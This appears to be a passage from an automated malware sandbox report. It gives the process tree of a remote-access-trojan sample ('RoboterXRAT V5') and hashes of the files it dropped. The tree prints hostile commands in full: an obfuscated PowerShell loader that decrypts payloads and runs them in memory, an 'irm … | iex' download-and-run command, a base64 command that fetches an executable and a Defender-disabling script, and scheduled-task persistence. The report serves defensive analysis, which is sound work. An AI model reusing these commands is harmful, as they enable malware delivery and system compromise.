PID:2548 -
C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"11⤵PID:1860
-
-
C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"11⤵PID:1312
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit7⤵
- System Location Discovery: System Language Discovery
PID:3020 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"6⤵
- Executes dropped EXE
PID:4876
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2988
-
-
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:3712
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3656 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"6⤵
- Executes dropped EXE
PID:2684 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"7⤵
- Executes dropped EXE
PID:5116
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1648
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"7⤵
- Executes dropped EXE
PID:3836
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:224
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"6⤵
- Executes dropped EXE
PID:3172
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"6⤵
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "irm rentry.co/microsoft-vir/raw | iex"7⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=8⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1116 -
C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"9⤵
- Executes dropped EXE
PID:164 -
C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"C:\Users\Admin\AppData\Local\Temp\wzcnetwork.exe"10⤵
- Executes dropped EXE
PID:4776 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "wzcnetwork" /tr "%Current%\wzcnetwork.exe"11⤵
- Scheduled Task/Job: Scheduled Task
PID:2100
-
-
-
C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"C:\Users\Admin\AppData\Local\Temp\wzcsvc.exe"10⤵
- Suspicious behavior: EnumeratesProcesses
PID:4684
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit6⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9E15.tmp.bat""6⤵
- System Location Discovery: System Language Discovery
PID:2520 -
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3932
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3780
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservice -s CDPSvc1⤵PID:4944
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV1⤵PID:4676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵PID:4556
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2452
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s wlidsvc1⤵PID:3180
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4628
-
C:\Windows\system32\ApplicationFrameHost.exeC:\Windows\system32\ApplicationFrameHost.exe -Embedding1⤵PID:2928
-
C:\Windows\System32\InstallAgent.exeC:\Windows\System32\InstallAgent.exe -Embedding1⤵PID:4672
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4768
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵PID:3820
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Enumerates system info in registry
PID:4240
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
654B
MD516c5fce5f7230eea11598ec11ed42862
SHA175392d4824706090f5e8907eee1059349c927600
SHA25687ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
-
Filesize
3KB
MD53ebba88045d3c326e606026c8d303313
SHA15ae1efd7971f053d41cd72de77dbccb102160149
SHA256b76d37f23c570263d214957deef474d0a0fdbc5194fd65d974584e6dc0600825
SHA512ebac584ab568b0bc808643e259651a94d0ace34f6928e5a3857f32ca94ddff77b6b53fa809e9726726f7636874037dccbc440716f40907232455eae5798da367
-
Filesize
1KB
MD519fa667a538a7330e0784409cd460887
SHA148f1f0a7efd3404dfc38feb106c107ce259382cc
SHA25645872ce54fd391ad3744d35486e135c692867aef1e1fe897fe9d7ab174948fbf
SHA5120f9fa8e0342184fde1359ca2cb31a31c65accbe1af8bdd12d41c389b2c32b5410faf7915580aeac62edda9bb5b857c80ce4b6e44608abc123b6eb3400e329dd4
-
Filesize
522B
MD529ac3d31c772ba5e216f15cd6d85cd29
SHA145d682f8f9f8658e4b1c717782811f24b08be250
SHA25682cb10a670e760c3159ae57f943dbd2b478727a9e82b307edd559e54ffad0f9d
SHA51287403b70e4ba9a19f96eaef900cffe6769c3aa35d047cac26175f27ffbed8e625a8f8a12d191a6e63f75ef4b8b1bee2078f4659325a12d534d61427d58ceb8a3
-
Filesize
1KB
MD54222d728f0de74f60a686b5488756219
SHA163f539b9eb581690e07424faf8cec41fe6343f45
SHA256f4387d5c4aaedc2aea05df0794e23d860e04df07e41216065e76b1a4767e2521
SHA5122ce87eea7378914a0b7969ca5e6d8f21530bd9e1d78cd579258c74d952bc517d1c8be7a2ae3c5bcfd583e3e1f454700ec2cf59b9920a935034ff9846d37ee191
-
Filesize
8.2MB
MD52bcf4d81fc953d9abce674d4721633d4
SHA17310f555418c254aba6f520b2ee72fb7cebb8763
SHA2565069ad2bcd0ef590b340cdd8be3f262c560faa17f8774664499cdf7d04cf9393
SHA5127bfb72dd930f6346479a5e346ee817e7cecafca4ad5a4ee6a8e987c5278aa13813f3e17166d178ff957e1f23d2ecf63f01b62965e423b1d9a4be8d2b8be3b934
-
Filesize
2.7MB
MD58a14259150f471ec328687c9bcedd5b1
SHA1e8c2ae02e49c4b5d1eb8494410574ba7a5c61119
SHA2566994b5ff8d1589088cac1984216f3d15bf42d8c04f27f2795a557565e2e94ed1
SHA512a6d2466793a863b3b213900ec3d8b8066c409cb8b7a917bfe0c2c51f308afc94a7c08fe17d78d972f18bc0cdbef826af428250ae92007dedbbfbc85ec3d65bd5
-
Filesize
21.3MB
MD5ad2f02cf9676881547f696f59d30a816
SHA18c7e3e9ce36fd74db6d725fe086ff693508ab10c
SHA25640857dd4534f369a1b94e042f794c2d0b858bb856dcff16df61bb4b66df890e5
SHA512bee0fc3646a4967eb363e671525659187561e2be63f295295ba5635f8a2aaea1867739bda06637447348ca254f270ad9a564e1c11b70995897e238b9f749e2c8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
259KB
MD54e949e2528cffcf3c51c0fb9185a3b4e
SHA1c48dc3493e75bce32680fce6ec42b11bc5cfb8c9
SHA256ecef254e99e36a376c8fdc4dfbb99c0593b4fd2270437df3821990021278ec0a
SHA512284be4b7215b882bb55e7df727c16628a692ce8e0dc974220e7f9b542bef9fafbb20a7db41df176e4c52142035375048638476577c594ebb8392b24346f0e619
-
Filesize
230KB
MD5c44a5f5978d95c5f2267b24b29f0f512
SHA1c9f4fd16130ed87437faa002138d36cbbfa06aaa
SHA25655dd738b5ccada8533d959d0652cdd8f768cc183fa924424e310bb3d4d811a49
SHA51246be2766736c4d0eb3a4a7a0b847b683fbb21747e64e4a967cf0b4798f77ecac8594f98f0b6f3d29c9f0d507bb711dee9cffabff21708357ba0a9dabf035b4fa
-
Filesize
153B
MD5c50b549a135b3d7f6133ebc9c26520bd
SHA1d4d29a2bf2f6f438eb74d5cd75e3e716f51c2bf4
SHA2565311cf507fe5b1c94c7d66badb6ef7339f23ce70a166a256214389ed683c24a7
SHA512a94e36b01bb48d362ea30acaf33b94848e37b6f4d3bd4be38d8b5b364ce37c2903237f6bea389336b3370940cc6c613131e2b679e0b012a765c513143db3799a